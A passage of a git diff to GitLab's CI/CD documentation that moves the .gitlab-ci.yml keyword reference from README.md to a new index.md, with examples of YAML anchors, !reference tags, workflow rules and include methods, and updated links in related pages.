[`TRANSFER_METER_FREQUENCY`](../runners/configure_runners.md#artifact-and-cache-settings) (artifact/cache meter update frequency) -- [`ARTIFACT_COMPRESSION_LEVEL`](../runners/configure_runners.md#artifact-and-cache-settings) (artifact archiver compression level) -- [`CACHE_COMPRESSION_LEVEL`](../runners/configure_runners.md#artifact-and-cache-settings) (cache archiver compression level) - -You can also use variables to configure how many times a runner -[attempts certain stages of job execution](../runners/configure_runners.md#job-stages-attempts). - -## YAML-specific features - -In your `.gitlab-ci.yml` file, you can use YAML-specific features like anchors (`&`), aliases (`*`), -and map merging (`<<`). Use these features to reduce the complexity -of the code in the `.gitlab-ci.yml` file. - -Read more about the various [YAML features](https://learnxinyminutes.com/docs/yaml/). - -In most cases, the [`extends` keyword](#extends) is more user friendly and you should -use it when possible. - -You can use YAML anchors to merge YAML arrays. - -### Anchors - -YAML has a feature called 'anchors' that you can use to duplicate -content across your document. - -Use anchors to duplicate or inherit properties. Use anchors with [hidden jobs](#hide-jobs) -to provide templates for your jobs. When there are duplicate keys, GitLab -performs a reverse deep merge based on the keys. - -You can't use YAML anchors across multiple files when using the [`include`](#include) -keyword. Anchors are only valid in the file they were defined in. To reuse configuration -from different YAML files, use [`!reference` tags](#reference-tags) or the -[`extends` keyword](#extends). - -The following example uses anchors and map merging. It creates two jobs, -`test1` and `test2`, that inherit the `.job_template` configuration, each -with their own custom `script` defined: - -```yaml -.job_template: &job_configuration # Hidden yaml configuration that defines an anchor named 'job_configuration' - image: ruby:2.6 - services: - - postgres - - redis - -test1: - <<: *job_configuration # Merge the contents of the 'job_configuration' alias - script: - - test1 project - -test2: - <<: *job_configuration # Merge the contents of the 'job_configuration' alias - script: - - test2 project -``` - -`&` sets up the name of the anchor (`job_configuration`), `<<` means "merge the -given hash into the current one," and `*` includes the named anchor -(`job_configuration` again). The expanded version of this example is: - -```yaml -.job_template: - image: ruby:2.6 - services: - - postgres - - redis - -test1: - image: ruby:2.6 - services: - - postgres - - redis - script: - - test1 project - -test2: - image: ruby:2.6 - services: - - postgres - - redis - script: - - test2 project -``` - -You can use anchors to define two sets of services. For example, `test:postgres` -and `test:mysql` share the `script` defined in `.job_template`, but use different -`services`, defined in `.postgres_services` and `.mysql_services`: - -```yaml -.job_template: &job_configuration - script: - - test project - tags: - - dev - -.postgres_services: - services: &postgres_configuration - - postgres - - ruby - -.mysql_services: - services: &mysql_configuration - - mysql - - ruby - -test:postgres: - <<: *job_configuration - services: *postgres_configuration - tags: - - postgres - -test:mysql: - <<: *job_configuration - services: *mysql_configuration -``` - -The expanded version is: - -```yaml -.job_template: - script: - - test project - tags: - - dev - -.postgres_services: - services: - - postgres - - ruby - -.mysql_services: - services: - - mysql - - ruby - -test:postgres: - script: - - test project - services: - - postgres - - ruby - tags: - - postgres - -test:mysql: - script: - - test project - services: - - mysql - - ruby - tags: - - dev -``` - -You can see that the hidden jobs are conveniently used as templates, and -`tags: [postgres]` overwrites `tags: [dev]`. - -#### YAML anchors for scripts - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/23005) in GitLab 12.5. - -You can use [YAML anchors](#anchors) with [script](#script), [`before_script`](#before_script), -and [`after_script`](#after_script) to use predefined commands in multiple jobs: - -```yaml -.some-script-before: &some-script-before - - echo "Execute this script first" - -.some-script: &some-script - - echo "Execute this script second" - - echo "Execute this script too" - -.some-script-after: &some-script-after - - echo "Execute this script last" - -job1: - before_script: - - *some-script-before - script: - - *some-script - - echo "Execute something, for this job only" - after_script: - - *some-script-after - -job2: - script: - - *some-script-before - - *some-script - - echo "Execute something else, for this job only" - - *some-script-after -``` - -#### YAML anchors for variables - -Use [YAML anchors](#anchors) with `variables` to repeat assignment -of variables across multiple jobs. You can also use YAML anchors when a job -requires a specific `variables` block that would otherwise override the global variables. - -The following example shows how override the `GIT_STRATEGY` variable without affecting -the use of the `SAMPLE_VARIABLE` variable: - -```yaml -# global variables -variables: &global-variables - SAMPLE_VARIABLE: sample_variable_value - ANOTHER_SAMPLE_VARIABLE: another_sample_variable_value - -# a job that must set the GIT_STRATEGY variable, yet depend on global variables -job_no_git_strategy: - stage: cleanup - variables: - <<: *global-variables - GIT_STRATEGY: none - script: echo $SAMPLE_VARIABLE -``` - -### Hide jobs - -If you want to temporarily disable a job, rather than commenting out all the -lines where the job is defined: - -```yaml -# hidden_job: -# script: -# - run test -``` - -Instead, you can start its name with a dot (`.`) and it is not processed by -GitLab CI/CD. In the following example, `.hidden_job` is ignored: - -```yaml -.hidden_job: - script: - - run test -``` - -Use this feature to ignore jobs, or use the -[YAML-specific features](#yaml-specific-features) and transform the hidden jobs -into templates. - -### `!reference` tags - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/266173) in GitLab 13.9. - -Use the `!reference` custom YAML tag to select keyword configuration from other job -sections and reuse it in the current section. Unlike [YAML anchors](#anchors), you can -use `!reference` tags to reuse configuration from [included](#include) configuration -files as well. - -In the following example, a `script` and an `after_script` from two different locations are -reused in the `test` job: - -- `setup.yml`: - - ```yaml - .setup: - script: - - echo creating environment - ``` - -- `.gitlab-ci.yml`: - - ```yaml - include: - - local: setup.yml - - .teardown: - after_script: - - echo deleting environment - - test: - script: - - !reference [.setup, script] - - echo running my own command - after_script: - - !reference [.teardown, after_script] - ``` - -In the following example, `test-vars-1` reuses all the variables in `.vars`, while `test-vars-2` -selects a specific variable and reuses it as a new `MY_VAR` variable. - -```yaml -.vars: - variables: - URL: "http://my-url.internal" - IMPORTANT_VAR: "the details" - -test-vars-1: - variables: !reference [.vars, variables] - script: - - printenv - -test-vars-2: - variables: - MY_VAR: !reference [.vars, variables, IMPORTANT_VAR] - script: - - printenv -``` - -You can't reuse a section that already includes a `!reference` tag. Only one level -of nesting is supported. - -## Skip Pipeline - -To push a commit without triggering a pipeline, add `[ci skip]` or `[skip ci]`, using any -capitalization, to your commit message. - -Alternatively, if you are using Git 2.10 or later, use the `ci.skip` [Git push option](../../user/project/push_options.md#push-options-for-gitlab-cicd). -The `ci.skip` push option does not skip merge request -pipelines. - -## Processing Git pushes - -GitLab creates at most four branch and tag pipelines when -pushing multiple changes in a single `git push` invocation. - -This limitation does not affect any of the updated merge request pipelines. -All updated merge requests have a pipeline created when using -[pipelines for merge requests](../merge_request_pipelines/index.md). - -## Deprecated keywords - -The following keywords are deprecated. - -### Globally-defined `types` - -WARNING: -`types` is deprecated, and could be removed in a future release. -Use [`stages`](#stages) instead. - -### Job-defined `type` - -WARNING: -`type` is deprecated, and could be removed in one of the future releases. -Use [`stage`](#stage) instead. - -### Globally-defined `image`, `services`, `cache`, `before_script`, `after_script` - -Defining `image`, `services`, `cache`, `before_script`, and -`after_script` globally is deprecated. Support could be removed -from a future release. - -Use [`default:`](#custom-default-keyword-values) instead. For example: - -```yaml -default: - image: ruby:3.0 - services: - - docker:dind - cache: - paths: [vendor/] - before_script: - - bundle config set path vendor/bundle - - bundle install - after_script: - - rm -rf tmp/ -``` - -<!-- ## Troubleshooting - -Include any troubleshooting steps that you can foresee. If you know beforehand what issues -one might have when setting this up, or when something is changed, or on upgrading, it's -important to describe those, too. Think of things that may go wrong and include them here. -This is important to minimize requests for support, and to avoid doc comments with -questions that you know someone might ask. - -Each scenario can be a third-level heading, e.g. `### Getting error message X`. -If you have none to add when creating a doc, leave this section in place -but commented out to help encourage others to add to it in the future. --> +<!-- This redirect file can be deleted after 2021-09-28. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/ci/yaml/gitlab_ci_yaml.md b/doc/ci/yaml/gitlab_ci_yaml.md index 266b35bd27f..2723cb19c1f 100644 --- a/doc/ci/yaml/gitlab_ci_yaml.md +++ b/doc/ci/yaml/gitlab_ci_yaml.md @@ -6,14 +6,14 @@ type: reference --- <!-- markdownlint-disable MD044 --> <!-- vale gitlab.Spelling = NO --> -# The .gitlab-ci.yml file +# The .gitlab-ci.yml file **(FREE)** <!-- vale gitlab.Spelling = YES --> <!-- markdownlint-enable MD044 --> To use GitLab CI/CD, you need: - Application code hosted in a Git repository. -- A file called [`.gitlab-ci.yml`](README.md) in the root of your repository, which +- A file called [`.gitlab-ci.yml`](index.md) in the root of your repository, which contains the CI/CD configuration. In the `.gitlab-ci.yml` file, you can define: @@ -27,7 +27,7 @@ In the `.gitlab-ci.yml` file, you can define: The scripts are grouped into **jobs**, and jobs run as part of a larger **pipeline**. You can group multiple independent jobs into **stages** that run in a defined order. -The CI/CD configuration needs at least one job that is [not hidden](README.md#hide-jobs). +The CI/CD configuration needs at least one job that is [not hidden](index.md#hide-jobs). You should organize your jobs in a sequence that suits your application and is in accordance with the tests you wish to perform. To [visualize](../pipeline_editor/index.md#visualize-ci-configuration) the process, imagine @@ -89,4 +89,4 @@ If anything goes wrong, you can  -[View the full syntax for the `.gitlab-ci.yml` file](README.md). +[View the full syntax for the `.gitlab-ci.yml` file](index.md). diff --git a/doc/ci/yaml/includes.md b/doc/ci/yaml/includes.md index 549a6fb964b..673a4e75c35 100644 --- a/doc/ci/yaml/includes.md +++ b/doc/ci/yaml/includes.md @@ -5,10 +5,10 @@ info: To determine the technical writer assigned to the Stage/Group associated w type: reference --- -# GitLab CI/CD include examples +# GitLab CI/CD include examples **(FREE)** -In addition to the [`includes` examples](README.md#include) listed in the -[GitLab CI YAML reference](README.md), this page lists more variations of `include` +In addition to the [`includes` examples](index.md#include) listed in the +[GitLab CI YAML reference](index.md), this page lists more variations of `include` usage. ## Single string or array of multiple values diff --git a/doc/ci/yaml/index.md b/doc/ci/yaml/index.md new file mode 100644 index 00000000000..c2b8ef50e6a --- /dev/null +++ b/doc/ci/yaml/index.md @@ -0,0 +1,4935 @@ +--- +stage: Verify +group: Pipeline Execution +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +type: reference +--- + +<!-- markdownlint-disable MD044 --> +<!-- vale gitlab.Spelling = NO --> +# Keyword reference for the .gitlab-ci.yml file **(FREE)** +<!-- vale gitlab.Spelling = YES --> +<!-- markdownlint-enable MD044 --> + +This document lists the configuration options for your GitLab `.gitlab-ci.yml` file. + +- For a quick introduction to GitLab CI/CD, follow the [quick start guide](../quick_start/index.md). +- For a collection of examples, see [GitLab CI/CD Examples](../examples/README.md). +- To view a large `.gitlab-ci.yml` file used in an enterprise, see the [`.gitlab-ci.yml` file for `gitlab`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/.gitlab-ci.yml). + +When you are editing your `.gitlab-ci.yml` file, you can validate it with the +[CI Lint](../lint.md) tool. + +## Job keywords + +A job is defined as a list of keywords that define the job's behavior. + +The keywords available for jobs are: + +| Keyword | Description | +| :-------------------------------------------|:------------| +| [`after_script`](#after_script) | Override a set of commands that are executed after job. | +| [`allow_failure`](#allow_failure) | Allow job to fail. A failed job does not cause the pipeline to fail. | +| [`artifacts`](#artifacts) | List of files and directories to attach to a job on success. | +| [`before_script`](#before_script) | Override a set of commands that are executed before job. | +| [`cache`](#cache) | List of files that should be cached between subsequent runs. | +| [`coverage`](#coverage) | Code coverage settings for a given job. | +| [`dast_configuration`](#dast_configuration) | Use configuration from DAST profiles on a job level. | +| [`dependencies`](#dependencies) | Restrict which artifacts are passed to a specific job by providing a list of jobs to fetch artifacts from. | +| [`environment`](#environment) | Name of an environment to which the job deploys. | +| [`except`](#only--except) | Control when jobs are not created. | +| [`extends`](#extends) | Configuration entries that this job inherits from. | +| [`image`](#image) | Use Docker images. | +| [`include`](#include) | Include external YAML files. | +| [`inherit`](#inherit) | Select which global defaults all jobs inherit. | +| [`interruptible`](#interruptible) | Defines if a job can be canceled when made redundant by a newer run. | +| [`needs`](#needs) | Execute jobs earlier than the stage ordering. | +| [`only`](#only--except) | Control when jobs are created. | +| [`pages`](#pages) | Upload the result of a job to use with GitLab Pages. | +| [`parallel`](#parallel) | How many instances of a job should be run in parallel. | +| [`release`](#release) | Instructs the runner to generate a [release](../../user/project/releases/index.md) object. | +| [`resource_group`](#resource_group) | Limit job concurrency. | +| [`retry`](#retry) | When and how many times a job can be auto-retried in case of a failure. | +| [`rules`](#rules) | List of conditions to evaluate and determine selected attributes of a job, and whether or not it's created. | +| [`script`](#script) | Shell script that is executed by a runner. | +| [`secrets`](#secrets) | The CI/CD secrets the job needs. | +| [`services`](#services) | Use Docker services images. | +| [`stage`](#stage) | Defines a job stage. | +| [`tags`](#tags) | List of tags that are used to select a runner. | +| [`timeout`](#timeout) | Define a custom job-level timeout that takes precedence over the project-wide setting. | +| [`trigger`](#trigger) | Defines a downstream pipeline trigger. | +| [`variables`](#variables) | Define job variables on a job level. | +| [`when`](#when) | When to run job. | + +### Unavailable names for jobs + +You can't use these keywords as job names: + +- `image` +- `services` +- `stages` +- `types` +- `before_script` +- `after_script` +- `variables` +- `cache` +- `include` + +### Custom default keyword values + +You can set global defaults for some keywords. Jobs that do not define one or more +of the listed keywords use the value defined in the `default:` section. + +These job keywords can be defined inside a `default:` section: + +- [`after_script`](#after_script) +- [`artifacts`](#artifacts) +- [`before_script`](#before_script) +- [`cache`](#cache) +- [`image`](#image) +- [`interruptible`](#interruptible) +- [`retry`](#retry) +- [`services`](#services) +- [`tags`](#tags) +- [`timeout`](#timeout) + +The following example sets the `ruby:3.0` image as the default for all jobs in the pipeline. +The `rspec 2.7` job does not use the default, because it overrides the default with +a job-specific `image:` section: + +```yaml +default: + image: ruby:3.0 + +rspec: + script: bundle exec rspec + +rspec 2.7: + image: ruby:2.7 + script: bundle exec rspec +``` + +## Global keywords + +Some keywords are not defined in a job. These keywords control pipeline behavior +or import additional pipeline configuration: + +| Keyword | Description | +|-------------------------|:------------| +| [`stages`](#stages) | The names and order of the pipeline stages. | +| [`workflow`](#workflow) | Control what types of pipeline run. | +| [`include`](#include) | Import configuration from other YAML files. | + +### `stages` + +Use `stages` to define stages that contain groups of jobs. `stages` is defined globally +for the pipeline. Use [`stage`](#stage) in a job to define which stage the job is +part of. + +The order of the `stages` items defines the execution order for jobs: + +- Jobs in the same stage run in parallel. +- Jobs in the next stage run after the jobs from the previous stage complete successfully. + +For example: + +```yaml +stages: + - build + - test + - deploy +``` + +1. All jobs in `build` execute in parallel. +1. If all jobs in `build` succeed, the `test` jobs execute in parallel. +1. If all jobs in `test` succeed, the `deploy` jobs execute in parallel. +1. If all jobs in `deploy` succeed, the pipeline is marked as `passed`. + +If any job fails, the pipeline is marked as `failed` and jobs in later stages do not +start. Jobs in the current stage are not stopped and continue to run. + +If no `stages` are defined in the `.gitlab-ci.yml` file, then `build`, `test` and `deploy` +are the default pipeline stages. + +If a job does not specify a [`stage`](#stage), the job is assigned the `test` stage. + +If a stage is defined, but no jobs use it, the stage is not visible in the pipeline. This is +useful for [compliance pipeline configuration](../../user/project/settings/index.md#compliance-pipeline-configuration) +because: + +- Stages can be defined in the compliance configuration but remain hidden if not used. +- The defined stages become visible when developers use them in job definitions. + +To make a job start earlier and ignore the stage order, use +the [`needs`](#needs) keyword. + +### `workflow` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/29654) in GitLab 12.5 + +Use `workflow:` to determine whether or not a pipeline is created. +Define this keyword at the top level, with a single `rules:` keyword that +is similar to [`rules:` defined in jobs](#rules). + +You can use the [`workflow:rules` templates](#workflowrules-templates) to import +a preconfigured `workflow: rules` entry. + +`workflow: rules` accepts these keywords: + +- [`if`](#rulesif): Check this rule to determine when to run a pipeline. +- [`when`](#when): Specify what to do when the `if` rule evaluates to true. + - To run a pipeline, set to `always`. + - To prevent pipelines from running, set to `never`. +- [`variables`](#workflowrulesvariables): If not defined, uses the [variables defined elsewhere](#variables). + +When no rules evaluate to true, the pipeline does not run. + +Some example `if` clauses for `workflow: rules`: + +| Example rules | Details | +|------------------------------------------------------|-----------------------------------------------------------| +| `if: '$CI_PIPELINE_SOURCE == "merge_request_event"'` | Control when merge request pipelines run. | +| `if: '$CI_PIPELINE_SOURCE == "push"'` | Control when both branch pipelines and tag pipelines run. | +| `if: $CI_COMMIT_TAG` | Control when tag pipelines run. | +| `if: $CI_COMMIT_BRANCH` | Control when branch pipelines run. | + +See the [common `if` clauses for `rules`](../jobs/job_control.md#common-if-clauses-for-rules) for more examples. + +In the following example, pipelines run for all `push` events (changes to +branches and new tags). Pipelines for push events with `-draft` in the commit message +don't run, because they are set to `when: never`. Pipelines for schedules or merge requests +don't run either, because no rules evaluate to true for them: + +```yaml +workflow: + rules: + - if: $CI_COMMIT_MESSAGE =~ /-draft$/ + when: never + - if: '$CI_PIPELINE_SOURCE == "push"' +``` + +This example has strict rules, and pipelines do **not** run in any other case. + +Alternatively, all of the rules can be `when: never`, with a final +`when: always` rule. Pipelines that match the `when: never` rules do not run. +All other pipeline types run: + +```yaml +workflow: + rules: + - if: '$CI_PIPELINE_SOURCE == "schedule"' + when: never + - if: '$CI_PIPELINE_SOURCE == "push"' + when: never + - when: always +``` + +This example prevents pipelines for schedules or `push` (branches and tags) pipelines. +The final `when: always` rule runs all other pipeline types, **including** merge +request pipelines. + +If your rules match both branch pipelines and merge request pipelines, +[duplicate pipelines](../jobs/job_control.md#avoid-duplicate-pipelines) can occur. + +#### `workflow:rules:variables` + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/294232) in GitLab 13.11. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/300997) in GitLab 14.1. + +You can use [`variables`](#variables) in `workflow:rules:` to define variables for specific pipeline conditions. + +For example: + +```yaml +variables: + DEPLOY_VARIABLE: "default-deploy" + +workflow: + rules: + - if: $CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH + variables: + DEPLOY_VARIABLE: "deploy-production" # Override globally-defined DEPLOY_VARIABLE + - if: $CI_COMMIT_REF_NAME =~ /feature/ + variables: + IS_A_FEATURE: "true" # Define a new variable. + - when: always # Run the pipeline in other cases + +job1: + variables: + DEPLOY_VARIABLE: "job1-default-deploy" + rules: + - if: $CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH + variables: # Override DEPLOY_VARIABLE defined + DEPLOY_VARIABLE: "job1-deploy-production" # at the job level. + - when: on_success # Run the job in other cases + script: + - echo "Run script with $DEPLOY_VARIABLE as an argument" + - echo "Run another script if $IS_A_FEATURE exists" + +job2: + script: + - echo "Run script with $DEPLOY_VARIABLE as an argument" + - echo "Run another script if $IS_A_FEATURE exists" +``` + +When the branch is the default branch: + +- job1's `DEPLOY_VARIABLE` is `job1-deploy-production`. +- job2's `DEPLOY_VARIABLE` is `deploy-production`. + +When the branch is `feature`: + +- job1's `DEPLOY_VARIABLE` is `job1-default-deploy`, and `IS_A_FEATURE` is `true`. +- job2's `DEPLOY_VARIABLE` is `default-deploy`, and `IS_A_FEATURE` is `true`. + +When the branch is something else: + +- job1's `DEPLOY_VARIABLE` is `job1-default-deploy`. +- job2's `DEPLOY_VARIABLE` is `default-deploy`. + +#### `workflow:rules` templates + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/217732) in GitLab 13.0. + +GitLab provides templates that set up `workflow: rules` +for common scenarios. These templates help prevent duplicate pipelines. + +The [`Branch-Pipelines` template](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates/Workflows/Branch-Pipelines.gitlab-ci.yml) +makes your pipelines run for branches and tags. + +Branch pipeline status is displayed in merge requests that use the branch +as a source. However, this pipeline type does not support any features offered by +[merge request pipelines](../pipelines/merge_request_pipelines.md), like +[pipelines for merged results](../pipelines/pipelines_for_merged_results.md) +or [merge trains](../pipelines/merge_trains.md). +This template intentionally avoids those features. + +To [include](#include) it: + +```yaml +include: + - template: 'Workflows/Branch-Pipelines.gitlab-ci.yml' +``` + +The [`MergeRequest-Pipelines` template](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates/Workflows/MergeRequest-Pipelines.gitlab-ci.yml) +makes your pipelines run for the default branch, tags, and +all types of merge request pipelines. Use this template if you use any of the +the [pipelines for merge requests features](../pipelines/merge_request_pipelines.md). + +To [include](#include) it: + +```yaml +include: + - template: 'Workflows/MergeRequest-Pipelines.gitlab-ci.yml' +``` + +#### Switch between branch pipelines and merge request pipelines + +> [Introduced in](https://gitlab.com/gitlab-org/gitlab/-/issues/201845) GitLab 13.8. + +To make the pipeline switch from branch pipelines to merge request pipelines after +a merge request is created, add a `workflow: rules` section to your `.gitlab-ci.yml` file. + +If you use both pipeline types at the same time, [duplicate pipelines](../jobs/job_control.md#avoid-duplicate-pipelines) +might run at the same time. To prevent duplicate pipelines, use the +[`CI_OPEN_MERGE_REQUESTS` variable](../variables/predefined_variables.md). + +The following example is for a project that runs branch and merge request pipelines only, +but does not run pipelines for any other case. It runs: + +- Branch pipelines when a merge request is not open for the branch. +- Merge request pipelines when a merge request is open for the branch. + +```yaml +workflow: + rules: + - if: '$CI_PIPELINE_SOURCE == "merge_request_event"' + - if: '$CI_COMMIT_BRANCH && $CI_OPEN_MERGE_REQUESTS' + when: never + - if: '$CI_COMMIT_BRANCH' +``` + +If the pipeline is triggered by: + +- A merge request, run a merge request pipeline. For example, a merge request pipeline + can be triggered by a push to a branch with an associated open merge request. +- A change to a branch, but a merge request is open for that branch, do not run a branch pipeline. +- A change to a branch, but without any open merge requests, run a branch pipeline. + +You can also add a rule to an existing `workflow` section to switch from branch pipelines +to merge request pipelines when a merge request is created. + +Add this rule to the top of the `workflow` section, followed by the other rules that +were already present: + +```yaml +workflow: + rules: + - if: $CI_COMMIT_BRANCH && $CI_OPEN_MERGE_REQUESTS && $CI_PIPELINE_SOURCE == "push" + when: never + - ... # Previously defined workflow rules here +``` + +[Triggered pipelines](../triggers/index.md) that run on a branch have a `$CI_COMMIT_BRANCH` +set and could be blocked by a similar rule. Triggered pipelines have a pipeline source +of `trigger` or `pipeline`, so `&& $CI_PIPELINE_SOURCE == "push"` ensures the rule +does not block triggered pipelines. + +### `include` + +> [Moved](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/42861) to GitLab Free in 11.4. + +Use `include` to include external YAML files in your CI/CD configuration. +You can break down one long `gitlab-ci.yml` file into multiple files to increase readability, +or reduce duplication of the same configuration in multiple places. + +You can also store template files in a central repository and `include` them in projects. + +`include` requires the external YAML file to have the extensions `.yml` or `.yaml`, +otherwise the external file is not included. + +You can't use [YAML anchors](#anchors) across different YAML files sourced by `include`. +You can only refer to anchors in the same file. To reuse configuration from different +YAML files, use [`!reference` tags](#reference-tags) or the [`extends` keyword](#extends). + +`include` supports the following inclusion methods: + +| Keyword | Method | +|:--------------------------------|:------------------------------------------------------------------| +| [`local`](#includelocal) | Include a file from the local project repository. | +| [`file`](#includefile) | Include a file from a different project repository. | +| [`remote`](#includeremote) | Include a file from a remote URL. Must be publicly accessible. | +| [`template`](#includetemplate) | Include templates that are provided by GitLab. | + +When the pipeline starts, the `.gitlab-ci.yml` file configuration included by all methods is evaluated. +The configuration is a snapshot in time and persists in the database. GitLab does not reflect any changes to +the referenced `.gitlab-ci.yml` file configuration until the next pipeline starts. + +The `include` files are: + +- Deep merged with those in the `.gitlab-ci.yml` file. +- Always evaluated first and merged with the content of the `.gitlab-ci.yml` file, + regardless of the position of the `include` keyword. + +NOTE: +Use merging to customize and override included CI/CD configurations with local +configurations. Local configurations in the `.gitlab-ci.yml` file override included configurations. + +#### Variables with `include` **(FREE SELF)** + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/284883) in GitLab 13.8. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/294294) in GitLab 13.9. + +You can [use some predefined variables in `include` sections](../variables/where_variables_can_be_used.md#gitlab-ciyml-file) +in your `.gitlab-ci.yml` file: + +```yaml +include: + project: '$CI_PROJECT_PATH' + file: '.compliance-gitlab-ci.yml' +``` + +For an example of how you can include these predefined variables, and the variables' impact on CI/CD jobs, +see this [CI/CD variable demo](https://youtu.be/4XR8gw3Pkos). + +#### `include:local` + +Use `include:local` to include a file that is in the same repository as the `.gitlab-ci.yml` file. +Use a full path relative to the root directory (`/`). + +If you use `include:local`, make sure that both the `.gitlab-ci.yml` file and the local file +are on the same branch. + +You can't include local files through Git submodules paths. + +All [nested includes](#nested-includes) are executed in the scope of the same project, +so it's possible to use local, project, remote, or template includes. + +Example: + +```yaml +include: + - local: '/templates/.gitlab-ci-template.yml' +``` + +You can also use shorter syntax to define the path: + +```yaml +include: '.gitlab-ci-production.yml' +``` + +Use local includes instead of symbolic links. + +##### `include:local` with wildcard file paths + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/25921) in GitLab 13.11. +> - [Deployed behind a feature flag](../../user/feature_flags.md), disabled by default. +> - [Enabled by default](https://gitlab.com/gitlab-org/gitlab/-/issues/327315) in GitLab 13.12. +> - Enabled on GitLab.com. +> - Recommended for production use. +> - For GitLab self-managed instances, GitLab administrators can opt to disable it. **(CORE ONLY)** + +There can be +[risks when disabling released features](../../user/feature_flags.md#risks-when-disabling-released-features). +Refer to this feature's version history for more details. + +You can use wildcard paths (`*` and `**`) with `include:local`. + +Example: + +```yaml +include: 'configs/*.yml' +``` + +When the pipeline runs, GitLab: + +- Adds all `.yml` files in the `configs` directory into the pipeline configuration. +- Does not add `.yml` files in subfolders of the `configs` directory. To allow this, + add the following configuration: + + ```yaml + # This matches all `.yml` files in `configs` and any subfolder in it. + include: 'configs/**.yml' + + # This matches all `.yml` files only in subfolders of `configs`. + include: 'configs/**/*.yml' + ``` + +The wildcard file paths feature is under development but ready for production use. +It is deployed behind a feature flag that is **enabled by default**. +[GitLab administrators with access to the GitLab Rails console](../../administration/feature_flags.md) +can opt to disable it. + +To enable it: + +```ruby +Feature.enable(:ci_wildcard_file_paths) +``` + +To disable it: + +```ruby +Feature.disable(:ci_wildcard_file_paths) +``` + +#### `include:file` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/53903) in GitLab 11.7. + +To include files from another private project on the same GitLab instance, +use `include:file`. You can use `include:file` in combination with `include:project` only. +Use a full path, relative to the root directory (`/`). + +For example: + +```yaml +include: + - project: 'my-group/my-project' + file: '/templates/.gitlab-ci-template.yml' +``` + +You can also specify a `ref`. If you do not specify a value, the ref defaults to the `HEAD` of the project: + +```yaml +include: + - project: 'my-group/my-project' + ref: main + file: '/templates/.gitlab-ci-template.yml' + + - project: 'my-group/my-project' + ref: v1.0.0 + file: '/templates/.gitlab-ci-template.yml' + + - project: 'my-group/my-project' + ref: 787123b47f14b552955ca2786bc9542ae66fee5b # Git SHA + file: '/templates/.gitlab-ci-template.yml' +``` + +All [nested includes](#nested-includes) are executed in the scope of the target project. +You can use local (relative to target project), project, remote, or template includes. + +##### Multiple files from a project + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/26793) in GitLab 13.6. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/271560) in GitLab 13.8. + +You can include multiple files from the same project: + +```yaml +include: + - project: 'my-group/my-project' + ref: main + file: + - '/templates/.builds.yml' + - '/templates/.tests.yml' +``` + +#### `include:remote` + +Use `include:remote` with a full URL to include a file from a different location. +The remote file must be publicly accessible by an HTTP/HTTPS `GET` request, because +authentication in the remote URL is not supported. For example: + +```yaml +include: + - remote: 'https://gitlab.com/example-project/-/raw/main/.gitlab-ci.yml' +``` + +All [nested includes](#nested-includes) execute without context as a public user, +so you can only `include` public projects or templates. + +#### `include:template` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/53445) in GitLab 11.7. + +Use `include:template` to include `.gitlab-ci.yml` templates that are +[shipped with GitLab](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates). + +For example: + +```yaml +# File sourced from the GitLab template collection +include: + - template: Auto-DevOps.gitlab-ci.yml +``` + +Multiple `include:template` files: + +```yaml +include: + - template: Android-Fastlane.gitlab-ci.yml + - template: Auto-DevOps.gitlab-ci.yml +``` + +All [nested includes](#nested-includes) are executed only with the permission of the user, +so it's possible to use project, remote or template includes. + +#### Nested includes + +> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/56836) in GitLab 11.9. + +Use nested includes to compose a set of includes. + +You can have up to 100 includes, but you can't have duplicate includes. + +In [GitLab 12.4](https://gitlab.com/gitlab-org/gitlab/-/issues/28212) and later, the time limit +to resolve all files is 30 seconds. + +#### Additional `includes` examples + +View [additional `includes` examples](includes.md). + +## Keyword details + +The following topics explain how to use keywords to configure CI/CD pipelines. + +### `image` + +Use `image` to specify [a Docker image](../docker/using_docker_images.md#what-is-an-image) to use for the job. + +For: + +- Usage examples, see [Define `image` in the `.gitlab-ci.yml` file](../docker/using_docker_images.md#define-image-in-the-gitlab-ciyml-file). +- Detailed usage information, refer to [Docker integration](../docker/index.md) documentation. + +#### `image:name` + +An [extended Docker configuration option](../docker/using_docker_images.md#extended-docker-configuration-options). + +For more information, see [Available settings for `image`](../docker/using_docker_images.md#available-settings-for-image). + +#### `image:entrypoint` + +An [extended Docker configuration option](../docker/using_docker_images.md#extended-docker-configuration-options). + +For more information, see [Available settings for `image`](../docker/using_docker_images.md#available-settings-for-image). + +#### `services` + +Use `services` to specify a [service Docker image](../services/index.md), linked to a base image specified in [`image`](#image). + +For: + +- Usage examples, see [Define `services` in the `.gitlab-ci.yml` file](../services/index.md#define-services-in-the-gitlab-ciyml-file). +- Detailed usage information, refer to [Docker integration](../docker/index.md) documentation. +- Example services, see [GitLab CI/CD Services](../services/index.md). + +##### `services:name` + +An [extended Docker configuration option](../docker/using_docker_images.md#extended-docker-configuration-options). + +For more information, see [Available settings for `services`](../services/index.md#available-settings-for-services). + +##### `services:alias` + +An [extended Docker configuration option](../docker/using_docker_images.md#extended-docker-configuration-options). + +For more information, see [Available settings for 